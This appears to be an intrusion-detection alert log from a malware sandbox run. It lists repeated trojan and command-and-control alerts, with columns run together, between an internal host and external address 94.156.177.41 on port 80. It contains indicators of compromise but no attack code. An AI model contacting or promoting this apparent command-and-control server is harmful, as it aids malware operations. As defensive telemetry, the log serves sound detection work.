                2024-11-28T09:15:57.425469+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749962TCP
                2024-11-28T09:15:59.222001+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749966TCP
                2024-11-28T09:16:00.928602+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749971TCP
                2024-11-28T09:16:02.628085+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749976TCP
                2024-11-28T09:16:04.294475+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749982TCP
                2024-11-28T09:16:06.130178+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749987TCP
                2024-11-28T09:16:07.829417+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749990TCP
                2024-11-28T09:16:09.534938+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749995TCP
                2024-11-28T09:16:11.339205+010020254831A Network Trojan was detected94.156.177.4180192.168.2.750000TCP
                2024-11-28T09:16:13.169394+010020254831A Network Trojan was detected94.156.177.4180192.168.2.750004TCP
                2024-11-28T09:16:14.840154+010020254831A Network Trojan was detected94.156.177.4180192.168.2.750009TCP
                2024-11-28T09:16:16.552480+010020254831A Network Trojan was detected94.156.177.4180192.168.2.750012TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-28T09:14:19.966495+010020243131Malware Command and Control Activity Detected192.168.2.74970794.156.177.4180TCP
                2024-11-28T09:14:21.741705+010020243131Malware Command and Control Activity Detected192.168.2.74970994.156.177.4180TCP
                2024-11-28T09:14:23.475744+010020243131Malware Command and Control Activity Detected192.168.2.74971094.156.177.4180TCP
                2024-11-28T09:14:25.137665+010020243131Malware Command and Control Activity Detected192.168.2.74971694.156.177.4180TCP
                2024-11-28T09:14:27.269118+010020243131Malware Command and Control Activity Detected192.168.2.74972294.156.177.4180TCP
                2024-11-28T09:14:28.997689+010020243131Malware Command and Control Activity Detected192.168.2.74973094.156.177.4180TCP
                2024-11-28T09:14:30.852920+010020243131Malware Command and Control Activity Detected192.168.2.74973394.156.177.4180TCP
                2024-11-28T09:14:32.658743+010020243131Malware Command and Control Activity Detected192.168.2.74973994.156.177.4180TCP
                2024-11-28T09:14:34.411968+010020243131Malware Command and Control Activity Detected192.168.2.74974594.156.177.4180TCP
                2024-11-28T09:14:36.257830+010020243131Malware Command and Control Activity Detected192.168.2.74975094.156.177.4180TCP
                2024-11-28T09:14:38.125230+010020243131Malware Command and Control Activity Detected192.168.2.74975594.156.177.4180TCP
                2024-11-28T09:14:39.946419+010020243131Malware Command and Control Activity Detected192.168.2.74976094.156.177.4180TCP
                2024-11-28T09:14:41.795444+010020243131Malware Command and Control Activity Detected192.168.2.74976494.156.177.4180TCP
                2024-11-28T09:14:43.957647+010020243131Malware Command and Control Activity Detected192.168.2.74977094.156.177.4180TCP
                2024-11-28T09:14:45.763443+010020243131Malware Command and Control Activity Detected192.168.2.74977594.156.177.4180TCP
                2024-11-28T09:14:47.672120+010020243131Malware Command and Control Activity Detected192.168.2.74977994.156.177.4180TCP
                2024-11-28T09:14:49.534406+010020243131Malware Command and Control Activity Detected192.168.2.74978594.156.177.4180TCP
                2024-11-28T09:14:51.346606+010020243131Malware Command and Control Activity Detected192.168.2.74979194.156.177.4180TCP
                2024-11-28T09:14:53.209909+010020243131Malware Command and Control Activity Detected192.168.2.74979594.156.177.4180TCP
                2024-11-28T09:14:55.171476+010020243131Malware Command and Control Activity Detected192.168.2.74979994.156.177.4180TCP
                2024-11-28T09:14:57.022105+010020243131Malware Command and Control Activity Detected192.168.2.74980494.156.177.4180TCP
                2024-11-28T09:14:58.886053+010020243131Malware Command and Control Activity Detected192.168.2.74980894.156.177.4180TCP
                2024-11-28T09:15:00.692482+010020243131Malware Command and Control Activity Detected192.168.2.74981494.156.177.4180TCP
                2024-11-28T09:15:02.364424+010020243131Malware Command and Control Activity Detected192.168.2.74982094.156.177.4180TCP
                2024-11-28T09:15:04.221399+010020243131Malware Command and Control Activity Detected192.168.2.74982394.156.177.4180TCP
                2024-11-28T09:15:06.031420+010020243131Malware Command and Control Activity Detected192.168.2.74982994.156.177.4180TCP
                2024-11-28T09:15:07.898325+010020243131Malware Command and Control Activity Detected192.168.2.74983394.156.177.4180TCP
                2024-11-28T09:15:09.702160+010020243131Malware Command and Control Activity Detected192.168.2.74983994.156.177.4180TCP
                2024-11-28T09:15:11.605394+010020243131Malware Command and Control Activity Detected192.168.2.74984494.156.177.4180TCP
                2024-11-28T09:15:13.478183+010020243131Malware Command and Control Activity Detected192.168.2.74984994.156.177.4180TCP
                2024-11-28T09:15:15.453442+010020243131Malware Command and Control Activity Detected192.168.2.74985494.156.177.4180TCP
                2024-11-28T09:15:17.303515+010020243131Malware Command and Control Activity Detected192.168.2.74985994.156.177.4180TCP
                2024-11-28T09:15:19.281950+010020243131Malware Command and Control Activity Detected192.168.2.74986494.156.177.4180TCP
                2024-11-28T09:15:21.096193+010020243131Malware Command and Control Activity Detected192.168.2.74986994.156.177.4180TCP
                2024-11-28T09:15:22.994413+010020243131Malware Command and Control Activity Detected192.168.2.74987494.156.177.4180TCP
                2024-11-28T09:15:24.699039+010020243131Malware Command and Control Activity Detected192.168.2.74988094.156.177.4180TCP
                2024-11-28T09:15:26.498742+010020243131Malware Command and Control Activity Detected192.168.2.74988594.156.177.4180TCP
                2024-11-28T09:15:28.371147+010020243131Malware Command and Control Activity Detected192.168.2.74988994.156.177.4180TCP
                2024-11-28T09:15:30.274220+010020243131Malware Command and Control Activity Detected192.168.2.74989394.156.177.4180TCP
                2024-11-28T09:15:32.168060+010020243131Malware Command and Control Activity Detected192.168.2.74989894.156.177.4180TCP
                2024-11-28T09:15:34.019143+010020243131Malware Command and Control Activity Detected192.168.2.74990394.156.177.4180TCP
                2024-11-28T09:15:35.875260+010020243131Malware Command and Control Activity Detected192.168.2.74990994.156.177.4180TCP
                2024-11-28T09:15:37.777782+010020243131Malware Command and Control Activity Detected192.168.2.74991494.156.177.4180TCP
                2024-11-28T09:15:39.432277+010020243131Malware Command and Control Activity Detected192.168.2.74991894.156.177.4180TCP
                2024-11-28T09:15:41.183582+010020243131Malware Command and Control Activity Detected192.168.2.74992294.156.177.4180TCP
                2024-11-28T09:15:42.916927+010020243131Malware Command and Control Activity Detected192.168.2.74992894.156.177.4180TCP
                2024-11-28T09:15:44.758427+010020243131Malware Command and Control Activity Detected192.168.2.74993094.156.177.4180TCP
                2024-11-28T09:15:46.605174+010020243131Malware Command and Control Activity Detected192.168.2.74993594.156.177.4180TCP
                2024-11-28T09:15:48.264914+010020243131Malware Command and Control Activity Detected192.168.2.74993894.156.177.4180TCP
                2024-11-28T09:15:50.179950+010020243131Malware Command and Control Activity Detected192.168.2.74994394.156.177.4180TCP
                2024-11-28T09:15:51.927975+010020243131Malware Command and Control Activity Detected192.168.2.74994894.156.177.4180TCP
                2024-11-28T09:15:53.838780+010020243131Malware Command and Control Activity Detected192.168.2.74995294.156.177.4180TCP
                2024-11-28T09:15:55.578098+010020243131Malware Command and Control Activity Detected192.168.2.74995894.156.177.4180TCP
                2024-11-28T09:15:57.305447+010020243131Malware Command and Control Activity Detected192.168.2.74996294.156.177.4180TCP
                2024-11-28T09:15:59.102043+010020243131Malware Command and Control Activity Detected192.168.2.74996694.156.177.4180TCP
                2024-11-28T09:16:00.808598+010020243131Malware Command and Control Activity Detected192.168.2.74997194.156.177.4180TCP
                2024-11-28T09:16:02.508043+010020243131Malware Command and Control Activity Detected192.168.2.74997694.156.177.4180TCP
                2024-11-28T09:16:04.174440+010020243131Malware Command and Control Activity Detected192.168.2.74998294.156.177.4180TCP
                2024-11-28T09:16:06.009910+010020243131Malware Command and Control Activity Detected192.168.2.74998794.156.177.4180TCP
                2024-11-28T09:16:07.709410+010020243131Malware Command and Control Activity Detected192.168.2.74999094.156.177.4180TCP
                2024-11-28T09:16:09.414886+010020243131Malware Command and Control Activity Detected192.168.2.74999594.156.177.4180TCP
                2024-11-28T09:16:11.219184+010020243131Malware Command and Control Activity Detected192.168.2.75000094.156.177.4180TCP
                2024-11-28T09:16:13.036489+010020243131Malware Command and Control Activity Detected192.168.2.75000494.156.177.4180TCP
                2024-11-28T09:16:14.719923+010020243131Malware Command and Control Activity Detected192.168.2.75000994.156.177.4180TCP
                2024-11-28T09:16:16.432519+010020243131Malware Command and Control Activity Detected192.168.2.75001294.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-28T09:14:19.966495+010020243181Malware Command and Control Activity Detected192.168.2.74970794.156.177.4180TCP
                2024-11-28T09:14:21.741705+010020243181Malware Command and Control Activity Detected192.168.2.74970994.156.177.4180TCP
                2024-11-28T09:14:23.475744+010020243181Malware Command and Control Activity Detected192.168.2.74971094.156.177.4180TCP
                2024-11-28T09:14:25.137665+010020243181Malware Command and Control Activity Detected192.168.2.74971694.156.177.4180TCP
                2024-11-28T09:14:27.269118+010020243181Malware Command and Control Activity Detected192.168.2.74972294.156.177.4180TCP
                2024-11-28T09:14:28.997689+010020243181Malware Command and Control Activity Detected192.168.2.74973094.156.177.4180TCP
                2024-11-28T09:14:30.852920+010020243181Malware Command and Control Activity Detected192.168.2.74973394.156.177.4180TCP
                2024-11-28T09:14:32.658743+010020243181Malware Command and Control Activity Detected192.168.2.74973994.156.177.4180TCP
                2024-11-28T09:14:34.411968+010020243181Malware Command and Control Activity Detected192.168.2.74974594.156.177.4180TCP
                2024-11-28T09:14:36.257830+010020243181Malware Command and Control Activity Detected192.168.2.74975094.156.177.4180TCP
                2024-11-28T09:14:38.125230+010020243181Malware Command and Control Activity Detected192.168.2.74975594.156.177.4180TCP
                2024-11-28T09:14:39.946419+010020243181Malware Command and Control Activity Detected192.168.2.74976094.156.177.4180TCP
                2024-11-28T09:14:41.795444+010020243181Malware Command and Control Activity Detected192.168.2.74976494.156.177.4180TCP
                2024-11-28T09:14:43.957647+010020243181Malware Command and Control Activity Detected192.168.2.74977094.156.177.4180TCP
                2024-11-28T09:14:45.763443+010020243181Malware Command and Control Activity Detected192.168.2.74977594.156.177.4180TCP
                2024-11-28T09:14:47.672120+010020243181Malware Command and Control Activity Detected192.168.2.74977994.156.177.4180TCP
                2024-11-28T09:14:49.534406+010020243181Malware Command and Control Activity Detected192.168.2.74978594.156.177.4180TCP
                2024-11-28T09:14:51.346606+010020243181Malware Command and Control Activity Detected192.168.2.74979194.156.177.4180TCP
                2024-11-28T09:14:53.209909+010020243181Malware Command and Control Activity Detected192.168.2.74979594.156.177.4180TCP
                2024-11-28T09:14:55.171476+010020243181Malware Command and Control Activity Detected192.168.2.74979994.156.177.4180TCP
                2024-11-28T09:14:57.022105+010020243181Malware Command and Control Activity Detected192.168.2.74980494.156.177.4180TCP
                2024-11-28T09:14:58.886053+010020243181Malware Command and Control Activity Detected192.168.2.74980894.156.177.4180TCP
                2024-11-28T09:15:00.692482+010020243181Malware Command and Control Activity Detected192.168.2.74981494.156.177.4180TCP
                2024-11-28T09:15:02.364424+010020243181Malware Command and Control Activity Detected192.168.2.74982094.156.177.4180TCP
                2024-11-28T09:15:04.221399+010020243181Malware Command and Control Activity Detected192.168.2.74982394.156.177.4180TCP
                2024-11-28T09:15:06.031420+010020243181Malware Command and Control Activity Detected192.168.2.74982994.156.177.4180TCP
                2024-11-28T09:15:07.898325+010020243181Malware Command and Control Activity Detected192.168.2.74983394.156.177.4180TCP
                2024-11-28T09:15:09.702160+010020243181Malware Command and Control Activity Detected192.168.2.74983994.156.177.4180TCP
                2024-11-28T09:15:11.605394+010020243181Malware Command and Control Activity Detected192.168.2.74984494.156.177.4180TCP
                2024-11-28T09:15:13.478183+010020243181Malware Command and Control Activity Detected192.168.2.74984994.156.177.4180TCP
                2024-11-28T09:15:15.453442+010020243181Malware Command and Control Activity Detected192.168.2.74985494.156.177.4180TCP
                2024-11-28T09:15:17.303515+010020243181Malware Command and Control Activity Detected192.168.2.74985994.156.177.4180TCP
                2024-11-28T09:15:19.281950+010020243181Malware Command and Control Activity Detected192.168.2.74986494.156.177.4180TCP
                2024-11-28T09:15:21.096193+010020243181Malware Command and Control Activity Detected192.168.2.74986994.156.177.4180TCP
                2024-11-28T09:15:22.994413+010020243181Malware Command and Control Activity Detected192.168.2.74987494.156.177.4180TCP
                2024-11-28T09:15:24.699039+010020243181Malware Command and Control Activity Detected192.168.2.74988094.156.177.4180TCP
                2024-11-28T09:15:26.498742+010020243181Malware Command and Control Activity Detected192.168.2.74988594.156.177.4180TCP
                2024-11-28T09:15:28.371147+010020243181Malware Command and Control Activity Detected192.168.2.74988994.156.177.4180TCP
                2024-11-28T09:15:30.274220+010020243181Malware Command and Control Activity Detected192.168.2.74989394.156.177.4180TCP
                2024-11-28T09:15:32.168060+010020243181Malware Command and Control Activity Detected192.168.2.74989894.156.177.4180TCP
                2024-11-28T09:15:34.019143+010020243181Malware Command and Control Activity Detected192.168.2.74990394.156.177.4180TCP
                2024-11-28T09:15:35.875260+010020243181Malware Command and Control Activity Detected192.168.2.74990994.156.177.4180TCP
                2024-11-28T09:15:37.777782+010020243181Malware Command and Control Activity Detected192.168.2.74991494.156.177.4180TCP
                2024-11-28T09:15:39.432277+010020243181Malware Command and Control Activity Detected192.168.2.74991894.156.177.4180TCP
                2024-11-28T09:15:41.183582+010020243181Malware Command and Control Activity Detected192.168.2.74992294.156.177.4180TCP
                2024-11-28T09:15:42.916927+010020243181Malware Command and Control Activity Detected192.168.2.74992894.156.177.4180TCP
                2024-11-28T09:15:44.758427+010020243181Malware Command and Control Activity Detected192.168.2.74993094.156.177.4180TCP
                2024-11-28T09:15:46.605174+010020243181Malware Command and Control Activity Detected192.168.2.74993594.156.177.4180TCP
                2024-11-28T09:15:48.264914+010020243181Malware Command and Control Activity Detected192.168.2.74993894.156.177.4180TCP
                2024-11-28T09:15:50.179950+010020243181Malware Command and Control Activity Detected192.168.2.74994394.156.177.4180TCP
                2024-11-28T09:15:51.927975+010020243181Malware Command and Control Activity Detected192.168.2.74994894.156.177.4180TCP
                2024-11-28T09:15:53.838780+010020243181Malware Command and Control Activity Detected192.168.2.74995294.156.177.4180TCP
                2024-11-28T09:15:55.578098+010020243181Malware Command and Control Activity Detected192.168.2.74995894.156.177.4180TCP
                2024-11-28T09:15:57.305447+010020243181Malware Command and Control Activity Detected192.168.2.74996294.156.177.4180TCP
                2024-11-28T09:15:59.102043+010020243181Malware Command and Control Activity Detected192.168.2.74996694.156.177.4180TCP
                2024-11-28T09:16:00.808598+010020243181Malware Command and Control Activity Detected192.168.2.74997194.156.177.4180TCP
                2024-11-28T09:16:02.508043+010020243181Malware Command and Control Activity Detected192.168.2.74997694.156.177.4180TCP
                2024-11-28T09:16:04.174440+010020243181Malware Command and Control Activity Detected192.168.2.74998294.156.177.4180TCP
                2024-11-28T09:16:06.009910+010020243181Malware Command and Control Activity Detected192.168.2.74998794.156.177.4180TCP
                2024-11-28T09:16:07.709410+010020243181Malware Command and Control Activity Detected192.168.2.74999094.156.177.4180TCP
                2024-11-28T09:16:09.414886+010020243181Malware Command and Control Activity Detected192.168.2.74999594.156.177.4180TCP
                2024-11-28T09:16:11.219184+010020243181Malware Command and Control Activity Detected192.168.2.75000094.156.177.4180TCP
                2024-11-28T09:16:13.036489+010020243181Malware Command and Control Activity Detected192.168.2.75000494.156.177.4180TCP
                2024-11-28T09:16:14.719923+010020243181Malware Command and Control Activity Detected192.168.2.75000994.156.177.4180TCP
                2024-11-28T09:16:16.432519+010020243181Malware Command and Control Activity Detected192.168.2.75001294.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-28T09:14:15.096111+010020216411A Network Trojan was detected192.168.2.74970394.156.177.4180TCP
                2024-11-28T09:14:16.856131+010020216411A Network Trojan was detected192.168.2.74970594.156.177.4180TCP
                2024-11-28T09:14:18.697511+010020216411A Network Trojan was detected192.168.2.74970794.156.177.4180TCP
                2024-11-28T09:14:20.351381+010020216411A Network Trojan was detected192.168.2.74970994.156.177.4180TCP
                2024-11-28T09:14:22.160780+010020216411A Network Trojan was detected192.168.2.74971094.156.177.4180TCP
                2024-11-28T09:14:23.860632+010020216411A Network Trojan was detected192.168.2.74971694.156.177.4180TCP
                2024-11-28T09:14:25.519659+010020216411A Network Trojan was detected192.168.2.74972294.156.177.4180TCP
                2024-11-28T09:14:27.668725+010020216411A Network Trojan was detected192.168.2.74973094.156.177.4180TCP
                2024-11-28T09:14:29.385370+010020216411A Network Trojan was detected192.168.2.74973394.156.177.4180TCP
                2024-11-28T09:14:31.235320+010020216411A Network Trojan was detected192.168.2.74973994.156.177.4180TCP
                2024-11-28T09:14:33.051469+010020216411A Network Trojan was detected192.168.2.74974594.156.177.4180TCP
                2024-11-28T09:14:34.797317+010020216411A Network Trojan was detected192.168.2.74975094.156.177.4180TCP
                2024-11-28T09:14:36.663456+010020216411A Network Trojan was detected192.168.2.74975594.156.177.4180TCP
                2024-11-28T09:14:38.518570+010020216411A Network Trojan was detected192.168.2.74976094.156.177.4180TCP
                2024-11-28T09:14:40.330195+010020216411A Network Trojan was detected192.168.2.74976494.156.177.4180TCP
                2024-11-28T09:14:42.534473+010020216411A Network Trojan was detected192.168.2.74977094.156.177.4180TCP
                2024-11-28T09:14:44.345691+010020216411A Network Trojan was detected192.168.2.74977594.156.177.4180TCP
                2024-11-28T09:14:46.159487+010020216411A Network Trojan was detected192.168.2.74977994.156.177.4180TCP
                2024-11-28T09:14:48.063766+010020216411A Network Trojan was detected192.168.2.74978594.156.177.4180TCP
                2024-11-28T09:14:49.922881+010020216411A Network Trojan was detected192.168.2.74979194.156.177.4180TCP
                2024-11-28T09:14:51.737036+010020216411A Network Trojan was detected192.168.2.74979594.156.177.4180TCP
                2024-11-28T09:14:53.691338+010020216411A Network Trojan was detected192.168.2.74979994.156.177.4180TCP
                2024-11-28T09:14:55.562437+010020216411A Network Trojan was detected192.168.2.74980494.156.177.4180TCP
                2024-11-28T09:14:57.414725+010020216411A Network Trojan was detected192.168.2.74980894.156.177.4180TCP
                2024-11-28T09:14:59.272741+010020216411A Network Trojan was detected192.168.2.74981494.156.177.4180TCP
                2024-11-28T09:15:01.091239+010020216411A Network Trojan was detected192.168.2.74982094.156.177.4180TCP
                2024-11-28T09:15:02.750976+010020216411A Network Trojan was detected192.168.2.74982394.156.177.4180TCP
                2024-11-28T09:15:04.611133+010020216411A Network Trojan was detected192.168.2.74982994.156.177.4180TCP
                2024-11-28T09:15:06.425627+010020216411A Network Trojan was detected192.168.2.74983394.156.177.4180TCP
                2024-11-28T09:15:08.283034+010020216411A Network Trojan was detected192.168.2.74983994.156.177.4180TCP
                2024-11-28T09:15:10.092587+010020216411A Network Trojan was detected192.168.2.74984494.156.177.4180TCP
                2024-11-28T09:15:11.986718+010020216411A Network Trojan was detected192.168.2.74984994.156.177.4180TCP
                2024-11-28T09:15:13.869864+010020216411A Network Trojan was detected192.168.2.74985494.156.177.4180TCP
                2024-11-28T09:15:15.847454+010020216411A Network Trojan was detected192.168.2.74985994.156.177.4180TCP
                2024-11-28T09:15:17.771783+010020216411A Network Trojan was detected192.168.2.74986494.156.177.4180TCP
                2024-11-28T09:15:19.671910+010020216411A Network Trojan was detected192.168.2.74986994.156.177.4180TCP
                2024-11-28T09:15:21.490327+010020216411A Network Trojan was detected192.168.2.74987494.156.177.4180TCP
                2024-11-28T09:15:23.380781+010020216411A Network Trojan was detected192.168.2.74988094.156.177.4180TCP
                2024-11-28T09:15:25.077799+010020216411A Network Trojan was detected192.168.2.74988594.156.177.4180TCP
                2024-11-28T09:15:26.899973+010020216411A Network Trojan was detected192.168.2.74988994.156.177.4180TCP
                2024-11-28T09:15:28.747512+010020216411A Network Trojan was detected192.168.2.74989394.156.177.4180TCP
                2024-11-28T09:15:30.655415+010020216411A Network Trojan was detected192.168.2.74989894.156.177.4180TCP
                2024-11-28T09:15:32.556717+010020216411A Network Trojan was detected192.168.2.74990394.156.177.4180TCP
                2024-11-28T09:15:34.408050+010020216411A Network Trojan was detected192.168.2.74990994.156.177.4180TCP
                2024-11-28T09:15:36.267971+010020216411A Network Trojan was detected192.168.2.74991494.156.177.4180TCP
                2024-11-28T09:15:38.156180+010020216411A Network Trojan was detected192.168.2.74991894.156.177.4180TCP
                2024-11-28T09:15:39.816583+010020216411A Network Trojan was detected192.168.2.74992294.156.177.4180TCP
                2024-11-28T09:15:41.597339+010020216411A Network Trojan was detected192.168.2.74992894.156.177.4180TCP
                2024-11-28T09:15:43.294626+010020216411A Network Trojan was detected192.168.2.74993094.156.177.4180TCP
                2024-11-28T09:15:45.140468+010020216411A Network Trojan was detected192.168.2.74993594.156.177.4180TCP
                2024-11-28T09:15:46.988970+010020216411A Network Trojan was detected192.168.2.74993894.156.177.4180TCP
                2024-11-28T09:15:48.663942+010020216411A Network Trojan was detected192.168.2.74994394.156.177.4180TCP
                2024-11-28T09:15:50.622383+010020216411A Network Trojan was detected192.168.2.74994894.156.177.4180TCP
                2024-11-28T09:15:52.328756+010020216411A Network Trojan was detected192.168.2.74995294.156.177.4180TCP
                2024-11-28T09:15:54.218254+010020216411A Network Trojan was detected192.168.2.74995894.156.177.4180TCP
                2024-11-28T09:15:55.988730+010020216411A Network Trojan was detected192.168.2.74996294.156.177.4180TCP
                2024-11-28T09:15:57.686634+010020216411A Network Trojan was detected192.168.2.74996694.156.177.4180TCP
                2024-11-28T09:15:59.487158+010020216411A Network Trojan was detected192.168.2.74997194.156.177.4180TCP
                2024-11-28T09:16:01.189356+010020216411A Network Trojan was detected192.168.2.74997694.156.177.4180TCP
                2024-11-28T09:16:02.889650+010020216411A Network Trojan was detected192.168.2.74998294.156.177.4180TCP
                2024-11-28T09:16:04.587142+010020216411A Network Trojan was detected192.168.2.74998794.156.177.4180TCP
                2024-11-28T09:16:06.389002+010020216411A Network Trojan was detected192.168.2.74999094.156.177.4180TCP
                2024-11-28T09:16:08.095796+010020216411A Network Trojan was detected192.168.2.74999594.156.177.4180TCP
                2024-11-28T09:16:09.797793+010020216411A Network Trojan was detected192.168.2.75000094.156.177.4180TCP
                2024-11-28T09:16:11.614597+010020216411A Network Trojan was detected192.168.2.75000494.156.177.4180TCP
                2024-11-28T09:16:13.446836+010020216411A Network Trojan was detected192.168.2.75000994.156.177.4180TCP
                2024-11-28T09:16:15.111182+010020216411A Network Trojan was detected192.168.2.75001294.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-28T09:14:15.096111+010028257661Malware Command and Control Activity Detected192.168.2.74970394.156.177.4180TCP
                2024-11-28T09:14:16.856131+010028257661Malware Command and Control Activity Detected192.168.2.74970594.156.177.4180TCP
                2024-11-28T09:14:18.697511+010028257661Malware Command and Control Activity Detected192.168.2.74970794.156.177.4180TCP
                2024-11-28T09:14:20.351381+010028257661Malware Command and Control Activity Detected192.168.2.74970994.156.177.4180TCP
                2024-11-28T09:14:22.160780+010028257661Malware Command and Control Activity Detected192.168.2.74971094.156.177.4180TCP
                2024-11-28T09:14:23.860632+010028257661Malware Command and Control Activity Detected192.168.2.74971694.156.177.4180TCP
                2024-11-28T09:14:25.519659+010028257661Malware Command and Control Activity Detected192.168.2.74972294.156.177.4180TCP
                2024-11-28T09:14:27.668725+010028257661Malware Command and Control Activity Detected192.168.2.74973094.156.177.4180TCP
                2024-11-28T09:14:29.385370+010028257661Malware Command and Control Activity Detected192.168.2.74973394.156.177.4180TCP
                2024-11-28T09:14:31.235320+010028257661Malware Command and Control Activity Detected192.168.2.74973994.156.177.4180TCP
                2024-11-28T09:14:33.051469+010028257661Malware Command and Control Activity Detected192.168.2.74974594.156.177.4180TCP
                2024-11-28T09:14:34.797317+010028257661Malware Command and Control Activity Detected192.168.2.74975094.156.177.4180TCP
                2024-11-28T09:14:36.663456+010028257661Malware Command and Control Activity Detected192.168.2.74975594.156.177.4180TCP
                2024-11-28T09:14:38.518570+010028257661Malware Command and Control Activity Detected192.168.2.74976094.156.177.4180TCP
                2024-11-28T09:14:40.330195+010028257661Malware Command and Control Activity Detected192.168.2.74976494.156.177.4180TCP
                2024-11-28T09:14:42.534473+010028257661Malware Command and Control Activity Detected192.168.2.74977094.156.177.4180TCP
                2024-11-28T09:14:44.345691+010028257661Malware Command and Control Activity Detected192.168.2.74977594.156.177.4180TCP
                2024-11-28T09:14:46.159487+010028257661Malware Command and Control Activity Detected192.168.2.74977994.156.177.4180TCP
                2024-11-28T09:14:48.063766+010028257661Malware Command and Control Activity Detected192.168.2.74978594.156.177.4180TCP
                2024-11-28T09:14:49.922881+010028257661Malware Command and Control Activity Detected192.168.2.74979194.156.177.4180TCP
                2024-11-28T09:14:51.737036+010028257661Malware Command and Control Activity Detected192.168.2.74979594.156.177.4180TCP
                2024-11-28T09:14:53.691338+010028257661Malware Command and Control Activity Detected192.168.2.74979994.156.177.4180TCP
                2024-11-28T09:14:55.562437+010028257661Malware Command and Control Activity Detected192.168.2.74980494.156.177.4180TCP
                2024-11-28T09:14:57.414725+010028257661Malware Command and Control Activity Detected192.168.2.74980894.156.177.4180TCP
                2024-11-28T09:14:59.272741+010028257661Malware Command and Control Activity Detected192.168.2.74981494.156.177.4180TCP
                2024-11-28T09:15:01.091239+010028257661Malware Command and Control Activity Detected192.168.2.74982094.156.177.4180TCP
                2024-11-28T09:15:02.750976+010028257661Malware Command and Control Activity Detected192.168.2.74982394.156.177.4180TCP
                2024-11-28T09:15:04.611133+010028257661Malware Command and Control Activity Detected192.168.2.74982994.156.177.4180TCP
                2024-11-28T09:15:06.425627+010028257661Malware Command and Control Activity Detected192.168.2.74983394.156.177.4180TCP
                2024-11-28T09:15:08.283034+010028257661Malware Command and Control Activity Detected192.168.2.74983994.156.177.4180TCP
                2024-11-28T09:15:10.092587+010028257661Malware Command and Control Activity Detected192.168.2.74984494.156.177.4180TCP
                2024-11-28T09:15:11.986718+010028257661Malware Command and Control Activity Detected192.168.2.74984994.156.177.4180TCP
                2024-11-28T09:15:13.869864+010028257661Malware Command and Control Activity Detected192.168.2.74985494.156.177.4180TCP
                2024-11-28T09:15:15.847454+010028257661Malware Command and Control Activity Detected192.168.2.74985994.156.177.4180TCP
                2024-11-28T09:15:17.771783+010028257661Malware Command and Control Activity Detected192.168.2.74986494.156.177.4180TCP
                2024-11-28T09:15:19.671910+010028257661Malware Command and Control Activity Detected192.168.2.74986994.156.177.4180TCP
                2024-11-28T09:15:21.490327+010028257661Malware Command and Control Activity Detected192.168.2.74987494.156.177.4180TCP
                2024-11-28T09:15:23.380781+010028257661Malware Command and Control Activity Detected192.168.2.74988094.156.177.4180TCP
                2024-11-28T09:15:25.077799+010028257661Malware Command and Control Activity Detected192.168.2.74988594.156.177.4180TCP
                2024-11-28T09:15:26.899973+010028257661Malware Command and Control Activity Detected192.168.2.74988994.156.177.4180TCP
                2024-11-28T09:15:28.747512+010028257661Malware Command and Control Activity Detected192.168.2.74989394.156.177.4180TCP
                2024-11-28T09:15:30.655415+010028257661Malware Command and Control Activity Detected192.168.2.74989894.156.177.4180TCP
                2024-11-28T09:15:32.556717+010028257661Malware Command and Control Activity Detected192.168.2.74990394.156.177.4180TCP
                2024-11-28T09:15:34.408050+010028257661Malware Command and Control Activity Detected192.168.2.74990994.156.177.4180TCP
                2024-11-28T09:15:36.267971+010028257661Malware Command and Control Activity Detected192.168.2.74991494.156.177.4180TCP
                2024-11-28T09:15:38.156180+010028257661Malware Command and Control Activity Detected192.168.2.74991894.156.177.4180TCP
                2024-11-28T09:15:39.816583+010028257661Malware Command and Control Activity Detected192.168.2.74992294.156.177.4180TCP
                2024-11-28T09:15:41.597339+010028257661Malware Command and Control Activity Detected192.168.2.74992894.156.177.4180TCP
                2024-11-28T09:15:43.294626+010028257661Malware Command and Control Activity Detected192.168.2.74993094.156.177.4180TCP
                2024-11-28T09:15:45.140468+010028257661Malware Command and Control Activity Detected192.168.2.74993594.156.177.4180TCP
                2024-11-28T09:15:46.988970+010028257661Malware Command and Control Activity Detected192.168.2.74993894.156.177.4180TCP
                2024-11-28T09:15:48.663942+010028257661Malware Command and Control Activity Detected192.168.2.74994394.156.177.4180TCP
                2024-11-28T09:15:50.622383+010028257661Malware Command and Control Activity Detected192.168.2.74994894.156.177.4180TCP
                2024-11-28T09:15:52.328756+010028257661Malware Command and Control Activity Detected192.168.2.74995294.156.177.4180TCP
                2024-11-28T09:15:54.218254+010028257661Malware Command and Control Activity Detected192.168.2.74995894.156.177.4180TCP
                2024-11-28T09:15:55.988730+010028257661Malware Command and Control Activity Detected192.168.2.74996294.156.177.4180TCP
                2024-11-28T09:15:57.686634+010028257661Malware Command and Control Activity Detected192.168.2.74996694.156.177.4180TCP
                2024-11-28T09:15:59.487158+010028257661Malware Command and Control Activity Detected192.168.2.74997194.156.177.4180TCP
                2024-11-28T09:16:01.189356+010028257661Malware Command and Control Activity Detected192.168.2.74997694.156.177.4180TCP
                2024-11-28T09:16:02.889650+010028257661Malware Command and Control Activity Detected192.168.2.74998294.156.177.4180TCP
                2024-11-28T09:16:04.587142+010028257661Malware Command and Control Activity Detected192.168.2.74998794.156.177.4180TCP
                2024-11-28T09:16:06.389002+010028257661Malware Command and Control Activity Detected192.168.2.74999094.156.177.4180TCP
                2024-11-28T09:16:08.095796+010028257661Malware Command and Control Activity Detected192.168.2.74999594.156.177.4180TCP
                2024-11-28T09:16:09.797793+010028257661Malware Command and Control Activity Detected192.168.2.75000094.156.177.4180TCP
                2024-11-28T09:16:11.614597+010028257661Malware Command and Control Activity Detected192.168.2.75000494.156.177.4180TCP
                2024-11-28T09:16:13.446836+010028257661Malware Command and Control Activity Detected192.168.2.75000994.156.177.4180TCP
